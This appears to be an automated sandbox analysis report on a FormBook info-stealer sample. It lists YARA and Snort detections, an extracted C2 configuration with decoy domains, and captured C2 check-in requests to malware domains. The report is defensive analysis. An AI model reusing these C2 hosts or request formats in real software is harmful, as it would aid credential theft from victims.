1.0.aspnet_compiler.exe.400000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.0.aspnet_compiler.exe.400000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
1.0.aspnet_compiler.exe.400000.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.0.aspnet_compiler.exe.400000.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.0.aspnet_compiler.exe.400000.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
1.0.aspnet_compiler.exe.400000.2.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.0.aspnet_compiler.exe.400000.2.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.0.aspnet_compiler.exe.400000.2.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cc9:$sqlite3step: 68 34 1C 7B E1 0x15ddc:$sqlite3step: 68 34 1C 7B E1 0x15cf8:$sqlite3text: 68 38 2A 90 C5 0x15e1d:$sqlite3text: 68 38 2A 90 C5 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 16 entries

Snort Signatures

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.6 - Destination IP: 162.241.253.231

Timestamp:	192.168.2.6162.241.253.23149805802031449 05/25/22-11:47:01.632726
SID:	2031449
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.6 - Destination IP: 52.54.92.195

Timestamp:	192.168.2.652.54.92.19549798802031449 05/25/22-11:46:40.318240
SID:	2031449
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.6 - Destination IP: 162.241.253.231

Timestamp:	192.168.2.6162.241.253.23149805802031412 05/25/22-11:47:01.632726
SID:	2031412
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.6 - Destination IP: 52.54.92.195

Timestamp:	192.168.2.652.54.92.19549798802031412 05/25/22-11:46:40.318240
SID:	2031412
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.6 - Destination IP: 162.241.253.231

Timestamp:	192.168.2.6162.241.253.23149805802031453 05/25/22-11:47:01.632726
SID:	2031453
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.6 - Destination IP: 52.54.92.195

Timestamp:	192.168.2.652.54.92.19549798802031453 05/25/22-11:46:40.318240
SID:	2031453
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000009.00000002.637234072.00000000047F0000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.mentalnayaarifmetika.online/ocgr/"], "decoy": ["shiftmedicalstaffing.agency", "muktobangla.xyz", "attmleather.com", "modelahs.com", "clime.email", "yonatec.com", "mftie.com", "doxofcolor.com", "american-atlantic.net", "christineenergy.com", "fjqsdz.com", "nagpurmandarin.com", "hofwimmer.com", "gororidev.com", "china-eros.com", "xn--ekrt15fxyb2t2c.xn--czru2d", "dabsavy.com", "buggy4t.com", "souplant.com", "insurancewineappraisals.com", "012skz.xyz", "kincsemto.net", "zyaxious.website", "tellgalpy.com", "demetbatmaz.com", "wallacehills.com", "chambaultfleurs.com", "fairfieldgroupfw.com", "lotsimprovements.com", "dhslcy.com", "anotherdegen.com", "dearpennyyouradviceblogspot.com", "seekbeforefind.com", "societyalluredmcc.com", "climatecheckin.com", "candybox-eru.com", "tentacionescharlie.com", "exceedrigging.online", "skb-cabinet.com", "qhzhuhang.com", "ccav11.xyz", "sandstonehosting.com", "14offresimportantes.com", "xn--hj2bz6fwvan2be1g5tb.com", "embedded-electronic.com", "drsanaclinic.com", "ageofcryptos.com", "dreamonetnpasumo1.xyz", "engroconnect.net", "huvao.com", "denalicanninglids.com", "tootko.com", "edisson-bd.com", "myamazonloan.net", "dbcyebnveoyu.cloud", "floridacaterpillar.com", "travisjbogard.com", "dialoneconstruction.com", "tubesing.com", "gofilmwizards.com", "tahnforest.com", "salahov.info", "bimcellerviss.com", "garglimited.com"]}

Multi AV Scanner detection for submitted file

Source: jwRbEDUUZC.exe	Virustotal: Detection: 67%	Perma Link
Source: jwRbEDUUZC.exe	Metadefender: Detection: 31%	Perma Link
Source: jwRbEDUUZC.exe	ReversingLabs: Detection: 73%

Yara detected FormBook

Source: Yara match	File source: 1.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.637234072.00000000047F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.458062573.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.371851439.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.635249504.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.419943976.000000000D55D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.371477540.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.373668020.00000000035FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.457956681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.458109413.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.444239022.000000000D55D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: http://www.tubesing.com/ocgr/?5jm=9V0bXTkkxKWxDgp6RJOks70x/YcJP31kraxWgvuUzaENE/wb1OUHkodtz4aPYkPCWgKnca4quw==&q48d=SN6PFzMPJRoDS	Avira URL Cloud: Label: malware
Source: http://www.nagpurmandarin.com/ocgr/?5jm=sK8+WGPg2JRLe3fUQ4xa6L8WlFBJd5xCkWFiCNREvztrzLZiwMdrfToIj+s3oTo1GaSK+fkqdA==&q48d=SN6PFzMPJRoDS	Avira URL Cloud: Label: malware
Source: http://www.wallacehills.com/ocgr/?5jm=e/0Hm5WsGCZ9WAWS3m2jnNPZVvv73W2kM2wAvSWCn4dVzulK8Hz4WN5jVud3g/JTENNsBng/cw==&q48d=SN6PFzMPJRoDS	Avira URL Cloud: Label: malware
Source: www.mentalnayaarifmetika.online/ocgr/	Avira URL Cloud: Label: malware
Source: http://www.attmleather.com/ocgr/?q48d=SN6PFzMPJRoDS&5jm=kiCgFP8+acxhLHZoy8gx31rwxGvurJ2lCG9zpi5owq94JNIuYWHK8T6MP/53pnYYpwC2n0A2jw==	Avira URL Cloud: Label: malware

Machine Learning detection for sample

Source: jwRbEDUUZC.exe

Joe Sandbox ML: detected

Source: 1.2.aspnet_compiler.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.0.aspnet_compiler.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.0.aspnet_compiler.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.0.aspnet_compiler.exe.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: jwRbEDUUZC.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED

Source: jwRbEDUUZC.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Source:	Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\REDDDGGDG.pdb source: jwRbEDUUZC.exe
Source:	Binary string: cmmon32.pdb source: aspnet_compiler.exe, 00000001.00000002.458495887.0000000000DF9000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.458328091.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: cmmon32.pdbGCTL source: aspnet_compiler.exe, 00000001.00000002.458495887.0000000000DF9000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.458328091.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000001.00000003.372175294.0000000000EF0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.374295618.0000000001082000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.459106369.000000000133F000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000009.00000002.638425030.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000009.00000003.459919139.0000000004889000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000009.00000003.458024904.00000000046F2000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000009.00000002.638599152.0000000004B3F000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000001.00000003.372175294.0000000000EF0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.374295618.0000000001082000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.459106369.000000000133F000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000009.00000002.638425030.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000009.00000003.459919139.0000000004889000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000009.00000003.458024904.00000000046F2000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000009.00000002.638599152.0000000004B3F000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: THEDEVIL.pdb source: jwRbEDUUZC.exe, 00000000.00000002.373209526.00000000023D9000.00000004.00000800.00020000.00000000.sdmp, jwRbEDUUZC.exe, 00000000.00000002.374362164.00000000048A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: aspnet_compiler.pdb source: cmmon32.exe, 00000009.00000002.638909079.0000000004F57000.00000004.10000000.00040000.00000000.sdmp, cmmon32.exe, 00000009.00000002.634956986.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: THEDEVIL.pdb89N9 @9_CorDllMainmscoree.dll source: jwRbEDUUZC.exe, 00000000.00000002.373209526.00000000023D9000.00000004.00000800.00020000.00000000.sdmp, jwRbEDUUZC.exe, 00000000.00000002.374362164.00000000048A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\REDDDGGDG.pdbBSJB source: jwRbEDUUZC.exe

Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_00A130BE
Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_00A11C54
Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_00A103D7
Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_00A103D7
Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_00A13514
Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_00A10364
Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_00A1037C
Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_00A10340

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.tubesing.com
Source: C:\Windows\explorer.exe	Domain query: www.wallacehills.com
Source: C:\Windows\explorer.exe	Domain query: www.attmleather.com
Source: C:\Windows\explorer.exe	Network Connect: 192.185.0.218 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.117.168.233 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.241.253.231 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.doxofcolor.com
Source: C:\Windows\explorer.exe	Domain query: www.nagpurmandarin.com
Source: C:\Windows\explorer.exe	Domain query: www.yonatec.com
Source: C:\Windows\explorer.exe	Network Connect: 52.54.92.195 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49798 -> 52.54.92.195:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49798 -> 52.54.92.195:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49798 -> 52.54.92.195:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49805 -> 162.241.253.231:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49805 -> 162.241.253.231:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49805 -> 162.241.253.231:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.mentalnayaarifmetika.online/ocgr/

Source: Joe Sandbox View	ASN Name: AMAZON-AESUS AMAZON-AESUS
Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US

Source: global traffic	HTTP traffic detected: GET /ocgr/?5jm=e/0Hm5WsGCZ9WAWS3m2jnNPZVvv73W2kM2wAvSWCn4dVzulK8Hz4WN5jVud3g/JTENNsBng/cw==&q48d=SN6PFzMPJRoDS HTTP/1.1Host: www.wallacehills.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ocgr/?q48d=SN6PFzMPJRoDS&5jm=kiCgFP8+acxhLHZoy8gx31rwxGvurJ2lCG9zpi5owq94JNIuYWHK8T6MP/53pnYYpwC2n0A2jw== HTTP/1.1Host: www.attmleather.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ocgr/?5jm=sK8+WGPg2JRLe3fUQ4xa6L8WlFBJd5xCkWFiCNREvztrzLZiwMdrfToIj+s3oTo1GaSK+fkqdA==&q48d=SN6PFzMPJRoDS HTTP/1.1Host: www.nagpurmandarin.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ocgr/?q48d=SN6PFzMPJRoDS&5jm=tBqLR1P96jAoGzhM/bfMxIqpBnF4XdPQw9HD3GmR5P6T0l65+iRjfJ8EGOisALaFWgEX56fYJg== HTTP/1.1Host: www.yonatec.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ocgr/?5jm=9V0bXTkkxKWxDgp6RJOks70x/YcJP31kraxWgvuUzaENE/wb1OUHkodtz4aPYkPCWgKnca4quw==&q48d=SN6PFzMPJRoDS HTTP/1.1Host: www.tubesing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 52.54.92.195 52.54.92.195
Source: Joe Sandbox View	IP Address: 192.185.0.218 192.185.0.218

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.0X-Powered-By: ASP.NETDate: Wed, 25 May 2022 09:46:37 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 25 May 2022 09:46:50 GMTContent-Type: text/htmlContent-Length: 291ETag: "628d16df-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 May 2022 09:47:01 GMTServer: nginx/1.19.10Content-Type: text/html; charset=UTF-8Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Vary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Endurance-Cache-Level: 2Transfer-Encoding: chunkedData Raw: 31 65 37 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 0a 09 09 09 57 65 6c 63 6f 6d 65 20 26 6d 64 61 73 68 3b 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 09 09 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 09 09 3c 73 63 72 69 70 74 0a 09 09 09 73 72 63 3d 22 68 74 74 70 3a 2f 2f 32 62 73 69 6e 67 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 36 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 